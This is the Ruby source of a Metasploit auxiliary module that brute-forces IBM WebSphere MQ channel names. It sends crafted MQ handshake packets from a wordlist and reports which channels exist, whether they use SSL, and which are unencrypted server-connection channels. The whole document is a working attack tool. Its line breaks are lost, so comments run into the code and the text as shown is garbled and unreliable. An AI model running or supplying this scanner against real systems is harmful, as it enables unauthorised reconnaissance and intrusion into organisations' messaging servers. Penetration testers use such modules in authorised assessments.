IBM WebSphere MQ Channel Name Bruteforce

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::Tcp  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize    super(      'Name'        => 'IBM WebSphere MQ Channel Name Bruteforce',      'Description' => 'This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.',      'Author'      => 'Petros Koutroumpis',      'License'     => MSF_LICENSE    )    register_options([      Opt::RPORT(1414),      OptInt.new('TIMEOUT', [true, "The socket connect timeout in seconds", 10]),      OptInt.new('CONCURRENCY', [true, "The number of concurrent channel names to check", 10]),      OptPath.new('CHANNELS_FILE',        [ true, "The file that contains a list of channel names"]      )])  end  def create_packet(chan)    packet = "\x54\x53\x48\x20"+   # StructID    "\x00\x00\x01\x0c"+     # MQSegmLen    "\x02" +         # Byte Order    "\x01" +         # SegmType    "\x01" +        # CtlFlag1    "\x00" +        # CtlFlag2    "\x00\x00\x00\x00\x00\x00\x00\x00"+  # LUWIdent    "\x22\x02\x00\x00"+      # Encoding    "\xb5\x01" +      # CCSID    "\x00\x00" +      # Reserved    "\x49\x44\x20\x20" +    # StructID    "\x0d" +        # FAP Level    "\x26" +        # CapFlag1 - Channel Type    "\x00" +        # ECapFlag1    "\x00" +        # IniErrFlg1    "\x00\x00" +      # Reserved    "\x32\x00" +      # MaxMsgBtch    "\xec\x7f\x00\x00" +    # MaxTrSize    "\x00\x00\x40\x00" +    # MaxMsgSize    "\xff\xc9\x9a\x3b" +    # SegWrapVal    + chan +         # Channel name    "\x20" +        # CapFlag2    "\x20" +        # ECapFlag2    "\x20\x20" +      # ccsid    "QM1" + "\x20"*45 +      # Queue Manager Name    "\x20\x20\x20\x20" +    # HBInterval    "\x20\x20" +      # EFLLength    "\x20" +        # IniErrFlg2    "\x20" +        # Reserved1    "\x20\x20" +      # HdrCprLst    "\x20\x20\x20\x20\x2c\x01\x00\x00"+ # MSGCprLst1    "\x8a\x00\x00\x55\x00\xff\x00\xff"+ # MsgCprLst2    "\xff\xff" +      # Reserved2    "\xff\xff\xff\xff" +    # SSLKeyRst    "\xff\xff\xff\xff" +    # ConvBySKt    "\xff" +        # CapFlag3    "\xff" +        # ECapFlag3    "\xff\xff" +      # Reserved3    "\x00\x00\x00\x00" +    # ProcessId    "\x00\x00\x00\x00" +    # ThreadId    "\x00\x00\x05\x00" +    # TraceId    "\x00\x00\x10\x13\x00\x00" +   # ProdId    "\x01\x00\x00\x00\x01\x00" +   # ProdId    "MQMID" + "\x20"*43 +    # MQM Id    "\x20\x20\x20\x20\x20\x20\x20\x20"+ # Unknown    "\x20\x20\x20\x20\x20\x20\x00\x00"+ # Unknown    "\xff\xff\xff\xff\xff\xff\xff\xff"+ # Unknown    "\xff\xff\xff\xff\xff\xff\xff\xff"+ # Unknown    "\xff\xff\x00\x00\x00\x00\x00\x00"+ # Unknown    "\x00\x00\x00\x00\x00\x00"    # Unknown  end  def run_host(ip)    @channels = []    @unencrypted_mqi_channels = []    begin      channel_list      rescue ::Rex::ConnectionRefused        fail_with(Failure::Unreachable, "TCP Port closed.")      rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error, Errno::ECONNRESET        fail_with(Failure::Unreachable, "Connection Failed.")      rescue ::Exception => e        fail_with(Failure::Unknown, e)      end      if(@channels.empty?)        print_status("#{ip}:#{rport} No channels found.")      else        print_good("Channels found: #{@channels}")        print_good("Unencrypted MQI Channels found: #{@unencrypted_mqi_channels}")        report_note(          :host => rhost,          :port => rport,          :type => 'mq.channels'        )      print_line    end  end  def channel_list    channel_data = get_channel_names    while (channel_data.length > 0)      t = []      r = []      begin        1.upto(datastore['CONCURRENCY']) do          this_channel = channel_data.shift          if this_channel.nil?            next          end          t << framework.threads.spawn("Module(#{self.refname})-#{rhost}:#{rport}", false, this_channel) do |channel|            connect            vprint_status "#{rhost}:#{rport} - Sending request for #{channel}..."            if channel.length.to_i > 20              print_error("Channel names cannot exceed 20 characters.  Skipping.")              next            end            chan = channel + "\x20"*(20-channel.length.to_i)            timeout = datastore['TIMEOUT'].to_i            s = connect(false,              {                'RPORT' => rport,                'RHOST' => rhost,              }            )            s.put(create_packet(chan))            data = s.get_once(-1,timeout)            if data.nil?              print_status("No response received. Try increasing timeout.")              next            end            if not data[0...3].include? 'TSH'              next            end            if data[-4..-1] == "\x01\x00\x00\x00" # NO_CHANNEL code              next            end            if data[-4..-1] == "\x18\x00\x00\x00" # CIPHER_SPEC code              print_status("Found channel: #{channel}, IsEncrypted: True, IsMQI: N/A")            elsif data[-4..-1] == "\x02\x00\x00\x00" # CHANNEL_WRONG_TYPE code              print_status("Found channel: #{channel}, IsEncrypted: False, IsMQI: False")            else              print_status("Found channel: #{channel}, IsEncrypted: False, IsMQI: True")              @unencrypted_mqi_channels << channel            end            @channels << channel            disconnect          end        end        t.each {|x| x.join }      end    end  end  def get_channel_names    if(! @common)      File.open(datastore['CHANNELS_FILE'], "rb") do |fd|        data = fd.read(fd.stat.size)        @common = data.split(/\n/).compact.uniq      end    end    @common  endend